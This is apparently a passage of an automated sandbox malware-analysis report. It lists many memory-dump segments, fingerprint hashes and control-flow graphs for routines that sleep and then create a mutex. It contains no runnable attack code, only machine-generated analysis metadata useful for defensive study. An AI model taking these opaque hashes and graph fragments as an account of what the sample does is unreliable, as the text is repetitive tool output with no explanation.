                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721021913.0000000000DB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721045219.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721064010.0000000000DBE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721083619.0000000000DC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721103230.0000000000DC9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721122511.0000000000DCB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721142328.0000000000DCC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721165654.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721193761.0000000000DE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721213381.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721236438.0000000000DE6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721256792.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721280507.0000000000DF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721301049.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721329366.0000000000E0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721351970.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721374309.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721398668.0000000000E1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721419247.0000000000E1D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721441285.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721461282.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721482677.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721510508.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721532631.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721557120.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721577134.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721601398.0000000000E38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721621714.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721641509.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721662290.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721683973.0000000000E4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721702825.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721727208.0000000000E57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721750889.0000000000E5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721775954.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721796913.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721817513.0000000000E6E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721838706.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721872195.0000000000E8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721939800.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721966257.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721986621.0000000000ECA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722010599.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722030765.0000000000ED0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722052434.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722076202.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                                              • Opcode ID: 0e5beaa0259e636ea627dde45ebe37182fe18196b9b8591b3fe57674bacd31ae
                                                                                                                                                                                                                                                              • Instruction ID: 47b7920e32350bf441edad50a2c9934767c9e3d5468fd362e5cedc89540b3e9b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e5beaa0259e636ea627dde45ebe37182fe18196b9b8591b3fe57674bacd31ae
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB314831704204DBFB189B78DD8AFAEBBE2EBC6314F20829DE014A73D6C77599808751

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 207 bc9f44-bc9f64 211 bc9f66-bc9f72 207->211 212 bc9f92-bc9fae 207->212 213 bc9f88-bc9f8f call bdd663 211->213 214 bc9f74-bc9f82 211->214 215 bc9fdc-bc9ffb 212->215 216 bc9fb0-bc9fbc 212->216 213->212 214->213 219 bca92b 214->219 217 bc9ffd-bca009 215->217 218 bca029-bca916 call bd80c0 215->218 221 bc9fbe-bc9fcc 216->221 222 bc9fd2-bc9fd9 call bdd663 216->222 223 bca01f-bca026 call bdd663 217->223 224 bca00b-bca019 217->224 226 bca953-bca994 Sleep CreateMutexA 219->226 227 bca92b call bf6c6a 219->227 221->219 221->222 222->215 223->218 224->219 224->223 237 bca996-bca998 226->237 238 bca9a7-bca9a8 226->238 227->226 237->238 239 bca99a-bca9a5 237->239 239->238
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00BCA963
                                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00C23254), ref: 00BCA981
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1720616098.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720596880.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720616098.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720688459.0000000000C29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720708320.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720728683.0000000000C35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720747541.0000000000C36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720766956.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720894988.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720917073.0000000000D96000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720944333.0000000000DA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720964524.0000000000DAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721021913.0000000000DB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721045219.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721064010.0000000000DBE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721083619.0000000000DC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721103230.0000000000DC9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721122511.0000000000DCB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721142328.0000000000DCC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721165654.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721193761.0000000000DE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721213381.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721236438.0000000000DE6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721256792.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721280507.0000000000DF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721301049.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721329366.0000000000E0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721351970.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721374309.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721398668.0000000000E1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721419247.0000000000E1D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721441285.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721461282.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721482677.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721510508.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721532631.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721557120.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721577134.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721601398.0000000000E38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721621714.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721641509.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721662290.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721683973.0000000000E4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721702825.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721727208.0000000000E57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721750889.0000000000E5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721775954.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721796913.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721817513.0000000000E6E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721838706.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721872195.0000000000E8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721939800.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721966257.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721986621.0000000000ECA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722010599.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722030765.0000000000ED0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722052434.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722076202.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                                              • Opcode ID: 75817e6a1e53c3daf8d7a4ddb4afb2ffa484e5c0574fa2e5f3af703176001315
                                                                                                                                                                                                                                                              • Instruction ID: 50b4610f069fae8753b9e5daa50fcd4e85dd9fbf4503e264c9c86be0971b29ea
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75817e6a1e53c3daf8d7a4ddb4afb2ffa484e5c0574fa2e5f3af703176001315
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 743159317042488BFB189B78DD99FACB7E2EBC6318F20869DE014E73D5D775A9808752

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 241 bca079-bca099 245 bca09b-bca0a7 241->245 246 bca0c7-bca0e3 241->246 247 bca0bd-bca0c4 call bdd663 245->247 248 bca0a9-bca0b7 245->248 249 bca0e5-bca0f1 246->249 250 bca111-bca130 246->250 247->246 248->247 251 bca930-bca994 call bf6c6a Sleep CreateMutexA 248->251 253 bca107-bca10e call bdd663 249->253 254 bca0f3-bca101 249->254 255 bca15e-bca916 call bd80c0 250->255 256 bca132-bca13e 250->256 271 bca996-bca998 251->271 272 bca9a7-bca9a8 251->272 253->250 254->251 254->253 261 bca154-bca15b call bdd663 256->261 262 bca140-bca14e 256->262 261->255 262->251 262->261 271->272 273 bca99a-bca9a5 271->273 273->272
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00BCA963
                                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00C23254), ref: 00BCA981
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1720616098.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720596880.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720616098.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720688459.0000000000C29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720708320.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720728683.0000000000C35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720747541.0000000000C36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720766956.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720894988.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720917073.0000000000D96000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720944333.0000000000DA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720964524.0000000000DAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721021913.0000000000DB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721045219.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721064010.0000000000DBE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721083619.0000000000DC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721103230.0000000000DC9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721122511.0000000000DCB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721142328.0000000000DCC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721165654.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721193761.0000000000DE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721213381.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721236438.0000000000DE6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721256792.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721280507.0000000000DF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721301049.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721329366.0000000000E0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721351970.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721374309.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721398668.0000000000E1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721419247.0000000000E1D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721441285.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721461282.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721482677.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721510508.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721532631.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721557120.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721577134.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721601398.0000000000E38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721621714.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721641509.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721662290.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721683973.0000000000E4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721702825.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721727208.0000000000E57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721750889.0000000000E5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721775954.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721796913.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721817513.0000000000E6E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721838706.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721872195.0000000000E8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721939800.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721966257.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721986621.0000000000ECA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722010599.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722030765.0000000000ED0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722052434.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722076202.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                                              • Opcode ID: 1dcffd2a9a1203310edc1beb81c3e34aea40db0284d5fa871d65ccc507b6eaad
                                                                                                                                                                                                                                                              • Instruction ID: 454037640e498b74d5eea552bd1b1dab164a3d4eb58df8ebed85198c4c5a2827
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1dcffd2a9a1203310edc1beb81c3e34aea40db0284d5fa871d65ccc507b6eaad
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F93168317102089BEB189B78DDC6F6CF7B2DBC6318F24829DE014A73D5C77699808762

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
